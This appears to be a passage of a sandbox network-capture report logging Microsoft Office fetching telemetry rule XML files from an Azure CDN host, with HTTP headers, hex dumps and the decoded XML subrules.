                                  2024-11-12 15:42:16 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  77192.168.2.44983113.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:16 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:16 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:16 GMT
                                  Content-Type: text/xml
                                  Content-Length: 472
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                  ETag: "0x8DC582B91EAD002"
                                  x-ms-request-id: 8514c3eb-001e-0082-0ba0-345880000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154216Z-15869dbbcc6j87jfhC1DFWr0yc0000000890000000003914
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:16 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  78192.168.2.44983213.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:16 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:16 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:16 GMT
                                  Content-Type: text/xml
                                  Content-Length: 432
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                  ETag: "0x8DC582BAABA2A10"
                                  x-ms-request-id: f10ad1d1-001e-000b-20a3-3415a7000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154216Z-17df447cdb528ltlhC1DFWnt1c0000000c2g000000003sq3
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:16 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  79192.168.2.44983313.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:16 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:16 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:16 GMT
                                  Content-Type: text/xml
                                  Content-Length: 475
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                  ETag: "0x8DC582BBA740822"
                                  x-ms-request-id: 898dd9bc-901e-0048-53d2-2cb800000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154216Z-16547b76f7f2g4rlhC1DFWnx880000000ft0000000008n4k
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:16 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  80192.168.2.44983513.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:17 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:17 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:17 GMT
                                  Content-Type: text/xml
                                  Content-Length: 474
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                  ETag: "0x8DC582BA4037B0D"
                                  x-ms-request-id: 43524bb3-601e-003e-69d2-2c3248000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154217Z-16547b76f7f22sh5hC1DFWyb4w0000000ft00000000091kd
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:17 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  81192.168.2.44983413.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:17 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:17 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:17 GMT
                                  Content-Type: text/xml
                                  Content-Length: 427
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                  ETag: "0x8DC582BB464F255"
                                  x-ms-request-id: f6fa4055-801e-008c-27a1-347130000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154217Z-17df447cdb54qlp6hC1DFW67e800000001wg00000000fez7
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:17 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  82192.168.2.44983613.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:17 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:17 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:17 GMT
                                  Content-Type: text/xml
                                  Content-Length: 419
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                  ETag: "0x8DC582BA6CF78C8"
                                  x-ms-request-id: 1e588634-b01e-003e-24a1-348e41000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154217Z-15869dbbcc6ss7fxhC1DFWq6vs00000009bg000000002qxd
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:17 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  83192.168.2.44983813.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:17 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:18 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:18 GMT
                                  Content-Type: text/xml
                                  Content-Length: 405
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                  ETag: "0x8DC582B942B6AFF"
                                  x-ms-request-id: e1e5caf7-d01e-00ad-6fa7-34e942000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154218Z-17df447cdb59mt7dhC1DFWqpg40000000cbg000000001r27
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:18 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  84192.168.2.44983913.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:17 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:18 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:17 GMT
                                  Content-Type: text/xml
                                  Content-Length: 468
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                  ETag: "0x8DC582BBA642BF4"
                                  x-ms-request-id: 229e582e-901e-0083-26d2-2cbb55000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154217Z-16547b76f7frbg6bhC1DFWr5400000000frg00000000e35w
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:18 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  85192.168.2.44984013.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:18 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:18 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:18 GMT
                                  Content-Type: text/xml
                                  Content-Length: 174
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                  ETag: "0x8DC582B91D80E15"
                                  x-ms-request-id: c3d6966f-401e-0016-3ad8-2b53e0000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154218Z-16547b76f7f775p5hC1DFWzdvn0000000fvg000000007uyn
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:18 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  86192.168.2.44984113.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:18 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:18 UTC538INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:18 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1952
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                  ETag: "0x8DC582B956B0F3D"
                                  x-ms-request-id: d5f81cfa-001e-0017-1dd2-2c0c3c000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154218Z-16547b76f7f8dwtrhC1DFWd1zn0000000fv000000000mub7
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:18 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  87192.168.2.44984213.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:18 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:19 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:18 GMT
                                  Content-Type: text/xml
                                  Content-Length: 958
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                  ETag: "0x8DC582BA0A31B3B"
                                  x-ms-request-id: 8a5e2199-d01e-0014-3f2b-2ced58000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154218Z-16547b76f7f22sh5hC1DFWyb4w0000000fqg00000000fwf7
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:19 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
